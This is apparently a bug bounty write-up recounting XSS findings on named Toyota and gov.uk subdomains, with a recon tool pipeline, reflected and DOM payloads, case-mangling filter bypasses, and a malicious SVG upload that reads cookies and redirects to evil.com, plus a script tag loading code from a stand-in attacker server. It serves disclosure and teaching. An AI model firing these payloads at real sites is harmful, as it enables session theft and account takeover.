How I Found Multiple XSS Vulnerabilities Using Unknown Techniques

8 months ago 77
BOOK THIS SPACE FOR AD
ARTICLE AD

Khaledyassen

InfoSec Write-ups

Hello, everyone. I hope you are well.

بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ

Today I’m going to talk about Multiple XSS Attacks Using Different Techniques, which I discovered while working in various bug bounty programs.

XSS: (Cross-site scripting) is a security vulnerability that occurs when an attacker injects malicious scripts into web pages viewed by other users. XSS attacks aim to execute malicious scripts in the context of a victim’s browser, allowing the attacker to steal sensitive information. for example, in the javascript programming language, if the attacker can inject things like

<script src=https://attacker_Server.com/attack.js></script>
// Load malicious Java script files from the attacker server which execute malicious actions like stealing sensitive data from the victim like session cookies and getting account takeover.

1] Reflected XSS: is the simplest type of XSS. It happens when an application receives data in an HTTP request and includes that data within the response unsafely. EX: If we have a category parameter for filter clothes in the website, for example, “https://example.com?category=t-shirt”, and this value is reflected in an unsafe way in the response like <p>t-shirt</p> this means that we can inject our payload like<p><script>alert(document.cookie)</script></p> to get the session cookie.

2] DOM XSS: It occurs when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, The most important thing you need to understand in depth about DOM is the source and sink For more information about the source and sink look portswigger.

3] Stored XSS: It happens when an application receives data from an untrusted source and unsafely includes that data within its later HTTP responses. EX: Suppose a website allows users to submit comments on blog posts displayed to other users. Attackers submit malicious comments, these comments will be stored on the server, and when other users see these malicious comments, the attacker will steal their data.

There is more and more information about XSS but I will share some references at the end of the article, Now it's time for the bugs found.

* Critical DOM XSS in Toyota::

$Keys$: automation tools [gau+dalfox+etc..]

Now, We have a Toyota domain and we need to gather subdomains for the domain. You can use tools like sublist3rsubfinderasset finderamass -.. then filter these subdomains using httpx that are used to get the live subdomains.

httpx -l subdomains.txt -o httpx.txt

Now Let’s Gather the endpoints from a Wayback Machine and Common Crawl

echo "toyota.com" | gau --threads 5 >> Enpoints.txtcat httpx.txt | katana -jc >> Enpoints.txt

Because most of them would be duplicated, we would get rid of them with

cat Enpoints.txt | uro >> Endpoints_F.txt

gau: a tool that fetches known URLs from the Wayback Machine, for any domain.

katana: is a powerful tool that focuses on web crawling in depth.

uro: a good tool for filtering uninteresting/duplicate content from the endpoints gathered for example if we have multiple URLs like https://example.com?id=1 and https://example.com?id=2 will filter them to only one URL.

Note: You can automate all of the previous things with an automation script with the tools you are using like most security researchers to make the processes easier and I will share My scripts in future writeups.

Now, we have a lot of endpoints and we need to filter them for working. I’m using the awesome gf tool which filters the endpoints depending on the patterns provided for example there are patterns for XSS, SQLi, SSRF, etc… you can use any public patterns from GitHub like This and Add them in “~/.gf” directory.

cat Endpoints_F.txt | gf xss >> XSS.txt
# For getting the endpoints that have parameters which may be vulnerable to XSS

Then we will use the Gxss tool for finding parameters whose values are reflected in the response.

cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt

In this process, you have two options the first is manually testing, or use an XSS automation tool and confirm the results manually. Our file is huge, so I would use the Dalfox automation XSS scanners.

dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt

I found that there is a vulnerable subdomain let’s call it sub.toyota.com so let’s find out what is happening.

When I navigate to the vulnerable URL [https://sub.toyota.com/direcrory/?dir=%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E] I got a popup message

at that moment I wondered whether this was the only vulnerable parameter or if there were other parameters and why this happened. I found a lot of vulnerable parameters.

I looked for the response and I found that the vulnerable parameters exist in URL[source] exist in different Java script variables like “var returnUrl=”, “var applicationUri=”. you can see this Javascript code to understand the idea.

<script>
// Assuming the URL is http://test.com?param=test
var urlParams = new URLSearchParams(window.location.search);
var paramValue = urlParams.get('param');

// This will execute the script tag in the paramValue variable
document.write(paramValue)
</script>
// If you look at the code, You will see that the value added to the parameter without any sanitization.

Let's send the following URL to know if the target has any protection against cookies. [https://sub.toyota.com/direcrory/?dir=%3C%2Fscript%3E%3Cscript%3Econfirm%28document.cookie%29%3C%2Fscript%3E]

Unfortunately, this means that I can perform a full account takeover on any user[RXSS]. I reported the vulnerability in full detail, and it was accepted🙂.

* Medium Reflected XSS in bug bounty programs($$$)::

$Keys$: Hidden parameterManual testing

Reflected XSS is one of the most common bugs and easy to find but I will talk about specific seniors that I faced multiple times.

After doing my recon and collecting all relevant information on targets.com, I gathered Endpoints. I discovered a very interesting endpoint at [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php]. This gave me the following page.

When I navigated to the base URL, I received a 403 Forbidden.

I used my custom wordlist with dirsearch tool to fuzz the base URL and the other endpoints.

dirsearch -u https://tst2.dev.targets.com/ -w wordlist.txt -e php,cgi,htm,html,shtm,shtml,js,txt --random-agent
# (-u) for the target && (-w) for custom wordlist that would be used with the tool && (-e) different extesions that would be used with the tool && (--random-agent) to change the user agents for requests

But I did not get anything important, But wait what about the hidden parameters? Let’s scan the [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php] using the Arjun tool or param miner extension which are used for fuzzing on the URL using different requests like GET, POST, JSON, and XML for finding a valid query.

arjun -u https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php -m GET -w Parameters_Fuzz.txt
# (-u) for our target && (-m GET) sending requests using the GET method && (-w) for custom wordlist that would be used with the tool

The response

So Let’s work on the auth_status parameter for different injections like XSS, SQLi, etc.. but I will not talk about all injections for not wasting the time and I will focus on the Reflected XSS.

When injecting the khxss in the parameter value it reflected in the response when I navigated to the [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3Cscript%3Econfirm%285%29%3C%2Fscript%3E] to understand how the server handles the requests. I got 403 Forbidden.

Always the first and easiest way to bypass some protection is trying to manipulate the payload like changing the way you write the payload like (<sCrIpT>alert(1)</ScRipt>) OR (<scr<script>ipt>) or multiple techniques[because developers make a mistake when blacklisting only specific words]. you can automate this using public wordlists but when I figured [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3CsCriPt%3Econfirm%28documen.cookie%29%3C%2FScRipt%3E] it accepted and We got our XSS.

It is not the end pro :), when you find anything like that try to see if the sub-subdomains are vulnerable to the same bug or not, and this is what I did when I gathered subdomains for the [*.dev.targets.com] and I found about four vulnerable subdomains but when I reported them the triage team accepted them as one vulnerability and I finally got the bounty🙂.

Note: You can use the ffuf tool for fuzzing the subdomains with the full URL by using

ffuf -u "https://FUZZ.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3CsCriPt%3Econfirm%28documen.cookie%29%3C%2FScRipt%3E" -w subdomains.txt -c -v

* High-stored XSS via SVG file upload:

$keys$: File upload — Manual testing.

After my recon ended I looked for the aquatone results which are used to get screenshots for the subdomains. I discovered an interesting subdomain, so let’s work on it.

The URL https://sub.gov.uk/ is our goal. When you begin testing on a target, You must understand all of the target’s functions, such as [Register - Login - Forget_password - etc..]

When I went to create an account on the Register form, I discovered several stuff that required to be filled in such as username, email, password, organization name, and adding an association with a manufacturer.

Let’s add a payload in the username input like

"><img src=x onerror=alert(document.domain)>{{7*7}}'
<!--> If you looked for the previous payload you will find that it was testing for differeent vulnerabilites like [img tag for tesing for XSS. also you can use your XSS hunter payload] - [{{7*7}} for testing for SSTI] - [' for testing for SQLi]<-->

We can not see if it is vulnerable or not until we fill all empty inputs so let’s complete, but wait I can not because the username has security against malicious words. we can manipulate it with different techniques like changing payload - Encoding the content or other things but Let’s see if all inputs have the same protection or not. The organization field has multiple things to fill like organization name, address, country, etc. When I added the payload to the organization name.

It was accepted and our XSS payload was executed.

Okay, I didn’t stop here because many things needed to be tested, but I would focus on the File upload feature field in the relationship form.

File Upload vulnerability: A file upload vulnerability occurs when a website allows users to upload files without proper validation or sanitization of the input. This can lead to various security issues, including the execution of malicious scripts or the upload of harmful files that can compromise the system or steal sensitive information.

When you begin testing for file upload vulnerabilities. Many things need to be done, so I recommend reading the following post for most of the File Upload vulnerability techniques Here. But we will focus on the SVG file.

What is the SVG: Scalable Vector Graphics (SVG) is an XML-based vector image format that can contain interactive and animated graphics. SVG files can also include JavaScript code, which can be used for various tasks, including animation. Because SVG files can be treated as images in HTML, they can be placed in an image tag and will render perfectly. like <img src="rectangle.svg" alt="Rectangle" height="20" width="30">

The SVG file("rectangle.svg") can be something like the following

<svg width="200" height="100" xmlns="http://www.w3.org/2000/svg">
<rect x="20" y="20" width="160" height="60" fill="blue" />
</svg>
<!-->SVG file for creating a rectangle with a blue color<-->

I was able to upload an SVG file containing a malicious script, which was not properly sanitized, leading to the execution of the script.

Here is the malicious SVG file that I created

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie );
window.location.href="https://evil.com"
</script>
</svg>

Let’s upload it

I navigated to the file

Up, we would receive our stored XSS.

I reported the vulnerability in full detail, and it was accepted🙂.

Here’s the POC video.

* XSS with unknown technique:

$keys$: robots.txt — User-agent — Burp Suite.

Let’s say that we have https://targets.com. I looked for it, but I only found one page that gave me an internal error. Nothing important. When I fuzzed, there was nothing except the following robots.txt file:

If you are a CTF player or have played CTF before, the following thoughts will come to mind as normal.

What would happen if I went to the /settings page and replaced the User-Agent in the request with the values seen in the response?

When I intercepted the request with Burp Suite and changed the User-Agent to Mediapartners-Google, I didn’t discover anything for the /settings page, but I found a lot of acceptable pages, saying that we now have a new full web app. I didn’t expect something like that, and I felt

Like most of the targets we’re working on. Manual and automated methods are our keys.

After running the Burp Suite scan I discovered a few useful findings, one of which was an XSS vulnerability. Here are all of the details about the vulnerability I found.

Got to Burp Suite: -> Proxy -> intercept

Go to options in the intercept section

Go to match and replace then replace the User-agent with the new one(Mediapartners-Google) to intercept all requests with it

Go to our vulnerable URL https://targets.com//bundle/cardjdv1i”><script>alert(document.cookie)</script>mnybm?id=25020&timestamp=1704865352]

We got our XSS.

When I changed the User-Agent again to confirm that the misconfiguration came from it, I did not get anything so It is time to report our vulnerability.

Look for the following code to understand what may be happening

// It is just a simple example of Java Script code not the actual code
<html>
<body>
<p>This <span id="exampleElement"></span></p>
</body>
<script>
// Get the User-Agent value from the request
var userAgent = navigator.userAgent;

// Check if the User-Agent value is "Mediapartners-Google"
if (userAgent.indexOf("Mediapartners-Google") !== -1) {
// Assuming the URL is https://targets.com/bundle/<user-input>/
var userInput = window.location.pathname.split("/")[2];
document.getElementById("exampleElement").innerHTML = userInput;
}
</script>
</html>

When I reported it. It was not accepted because the subdomain is out of scope but I did not care because It is an unknown technique and I wanted to tell you that you must not leave anything you get and work hard.

Here’s the POC video.

In this section, we will talk in brief about how the developers can protect their websites from XSS attacks::

1] Validate and Sanitize Input: Always validate and sanitize user input to prevent the injection of malicious scripts.

2] Use Content Security Policy (CSP): CSP is a security feature that helps prevent cross-site scripting and other code injection attacks.

3] Output Encoding: When outputting user-supplied data, encode it to prevent the browser from interpreting it as HTML.

4] Implement a WAF (Web Application Firewall): A WAF can help filter out malicious requests and prevent XSS attacks.

It is the end of our article, and I hope you found it useful.

Read Entire Article